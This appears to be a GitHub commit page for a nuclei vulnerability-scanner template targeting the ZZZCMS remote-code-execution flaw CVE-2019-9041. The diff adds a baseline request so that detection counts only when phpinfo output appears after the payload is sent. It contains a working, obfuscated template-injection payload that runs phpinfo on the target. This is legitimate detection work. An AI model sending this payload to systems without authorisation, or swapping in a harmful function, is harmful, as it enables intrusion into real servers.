Merge pull request #8260 from kazet/zzzcms-rce-fp

ZZZCMS RCE is a false positive if we see phpinfo() without posting any data
projectdiscovery · Sep 26, 2023 · 2c1392e · 2c1392e
2 parents 4a02d8a + 5915161
commit 2c1392e
Showing 1 changed file with 16 additions and 17 deletions.
diff --git a/http/cves/2019/CVE-2019-9041.yaml b/http/cves/2019/CVE-2019-9041.yaml
@@ -26,24 +26,23 @@ info:
   tags: cve,cve2019,zzzcms,rce,edb
 
 http:
-  - method: POST
-    path:
-      - "{{BaseURL}}/search/"
+  - raw:
+      - |
+        POST /search/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-    body: |
-      keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
+      - |
+        POST /search/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
 
-    headers:
-      Content-Type: application/x-www-form-urlencoded
+        keys={if:array_map(base_convert(27440799224,10,32),array(1))}{end if}
 
-    matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - "phpinfo"
-          - "PHP Version"
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - '!contains(body_1, "phpinfo")'
+          - 'contains_all(body_2, "phpinfo","PHP Version")'
+        condition: and